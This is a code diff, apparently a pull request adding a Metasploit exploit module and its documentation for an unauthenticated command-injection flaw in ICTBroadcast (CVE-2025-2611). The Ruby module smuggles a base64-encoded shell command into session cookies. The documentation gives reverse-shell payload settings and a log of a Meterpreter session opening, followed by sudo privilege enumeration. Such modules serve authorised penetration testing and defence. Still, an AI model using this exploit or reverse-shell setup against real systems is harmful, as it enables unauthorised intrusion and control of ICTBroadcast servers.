Add Unauthenticated ICTBroadcast Remote Code Execution (CVE-2025-2611)

Author: Chocapikk

documentation/modules/exploit/linux/http/ictbroadcast_unauth_cookie.md

@@ -0,0 +1,156 @@
+## Vulnerable Application
+
+This Metasploit module exploits an **unauthenticated remote code
+execution (RCE)** vulnerability in **ICTBroadcast**.
+The vulnerability exists due to improper handling of session
+cookies in the authentication mechanism. An attacker can inject arbitrary system commands by modifying the session cookie.
+
+The issue affects **various versions of ICTBroadcast**, but
+specific impacted releases are currently unknown. The vulnerability allows an attacker to execute shell commands **without authentication**.
+
+## Options
+
+None
+
+## Testing
+
+To test the exploit, spin up a vulnerable ICTBroadcast instance with Docker.
+
+```yaml
+services:
+  db:
+    image: mariadb:10.6
+    container_name: ictmysql
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root     
+      MARIADB_ROOT_HOST: '%'       
+      MYSQL_DATABASE: ictbroadcast
+      MYSQL_USER: ictuser
+      MYSQL_PASSWORD: ictpass
+    volumes:
+      - db_data:/var/lib/mysql
+    ports:
+      - "3306:3306"
+
+  ictbroadcast:
+    image: chocapikk/ictbroadcast-cve-2025-2611:latest
+    container_name: ictbroadcast
+    depends_on:
+      - db
+    ports:
+      - "80:80"
+      - "443:443"
+    command: >
+      bash -c "
+        composer --working-dir=/usr require stefangabos/zebra_pagination &&
+        /usr/sbin/httpd -k start &&
+        /usr/sbin/php-fpm &&
+        tail -f /dev/null
+      "
+
+volumes:
+  db_data:
+```
+
+1. Start the stack:
+
+```bash
+docker compose up -d
+```
+
+2. Verify that the login page is reachable at **`http://localhost/login.php`**.
+   The application should issue a valid session cookie on first visit.
+
+3. Run the Metasploit module.
+   The exploit will automatically harvest the session cookie (format may vary across deployments)
+   and leverage it to execute arbitrary commands via the vulnerable endpoint.
+
+## Verification Steps
+1. Start **Metasploit Framework**:
+```bash
+msfconsole
+```
+
+2. Load the module:
+```bash
+use exploit/linux/http/ictbroadcast_unauth_cookie
+```
+
+3. Set the **target IP address**:
+```bash
+set RHOSTS <TARGET_IP>
+```
+
+4. Set the **payload** for command execution:
+```bash
+set PAYLOAD cmd/unix/reverse_bash
+```
+
+5. Configure the listener:
+```bash
+set LHOST <YOUR_IP>
+set LPORT 4444
+```
+
+6. Check if the target is vulnerable:
+```bash
+check
+```
+
+7. Exploit the target:
+```bash
+exploit
+```
+
+## Scenarios
+
+### **Unauthenticated Command Execution**
+**Note**: Ensure that the target is vulnerable using the `check` command before running the exploit.
+
+**Note**: The session cookie is retrieved dynamically and modified for command injection.
+
+```bash
+msf6 exploit(linux/http/ictbroadcast_unauth_cookie) > run http://lab/
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if target is an ICTBroadcast instance…
+[+] ICTBroadcast detected, verifying injection…
+[*] Retrieving session cookies dynamically...
+[*] Found cookies: BROADCAST="16c4d0bf9d5b5cf9d8dc3f19e6ea2338;"
+[+] The target is vulnerable. Injection confirmed (slept 3s)
+[*] Sending stage (3090404 bytes) to 192.168.128.3
+[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 192.168.128.3:58784) at 2025-08-02 19:27:09 +0200
+
+meterpreter > sysinfo 
+Computer     : 192.168.128.3
+OS           : Red Hat 8.10 (Linux 6.15.8-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > shell
+Process 798 created.
+Channel 1 created.
+export TERM=xterm
+SHELL=/bin/bash script -q /dev/null
+bash-4.4$ sudo -l
+sudo -l
+Matching Defaults entries for asterisk on f7681361bd20:
+    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
+    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
+    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
+    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
+    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
+    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
+    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
+
+User asterisk may run the following commands on f7681361bd20:
+    (root) NOPASSWD: /usr/sbin/asterisk
+    (root) NOPASSWD: /etc/init.d/asterisk
+    (root) NOPASSWD: /etc/init.d/httpd
+    (root) NOPASSWD: /etc/init.d/mysqld
+    (root) NOPASSWD: /etc/init.d/kannel
+    (root) NOPASSWD: /usr/sbin/ntpdate
+    (root) NOPASSWD: /usr/sbin/rabbitmqctl
+    (root) NOPASSWD: /bin/systemctl
+```

modules/exploits/linux/http/ictbroadcast_unauth_cookie.rb

@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ICTBroadcast Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution (RCE) vulnerability
+          in ICTBroadcast. The vulnerability exists in the way session cookies are handled
+          and processed, allowing an attacker to inject arbitrary system commands.
+        },
+        'Author' => [
+          'Valentin Lobstein' # Metasploit module, Vulnerability discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.ictbroadcast.com/'],
+          ['CVE', '2025-2611']
+        ],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix/Linux Command Shell',
+            {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2025-03-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def get_valid_cookies
+    return @valid_cookies if @valid_cookies
+
+    print_status('Retrieving session cookies dynamically...')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.php')
+    )
+
+    return [] unless res&.get_cookies
+
+    cookies = res.get_cookies.split('; ').map do |c|
+      key, value = c.split('=', 2)
+      next unless key && value
+
+      Msf::Exploit::Remote::HTTP::HttpCookie.new(key.strip, value.strip)
+    end.compact
+
+    print_status("Found cookies: #{cookies.map(&:to_s).join(', ')}")
+    @valid_cookies = cookies
+  end
+
+  def inject_cookie_payload(command)
+    cookies = get_valid_cookies
+    return if cookies.empty?
+
+    encoded_command = Rex::Text.encode_base64(command)
+    payload = "echo${IFS}#{encoded_command}|base64${IFS}-d|sh"
+
+    updated_cookies = cookies.map do |cookie|
+      "#{cookie.name}=`#{payload}`"
+    end.join('; ')
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.php'),
+      'headers' => { 'Cookie' => updated_cookies }
+    )
+  end
+
+  def check
+    print_status('Checking if target is an ICTBroadcast instance…')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    )
+    return Exploit::CheckCode::Unknown('No response from target.') unless res
+    return Exploit::CheckCode::Safe unless res.code == 200
+
+    html = res.get_html_document
+    title = html.at('title')&.text
+    keywords = html.at("meta[name='keywords']")&.[]('content')
+    description = html.at("meta[name='description']")&.[]('content')
+
+    if title&.include?('ICT Broadcast') ||
+       keywords&.include?('ict') ||
+       description&.include?('ICT Broadcast')
+
+      print_good('ICTBroadcast detected, verifying injection…')
+
+      [1, 2, 3, 4, 5].sample(3).each do |t|
+        start_time = Time.now
+        inject_cookie_payload("sleep #{t}")
+        if (Time.now - start_time) >= (t - 0.3)
+          return Exploit::CheckCode::Vulnerable("Injection confirmed (slept #{t}s)")
+        end
+      end
+
+      return Exploit::CheckCode::Appears('ICTBroadcast detected, but injection timing did not match.')
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    inject_cookie_payload(payload.encoded)
+  end
+end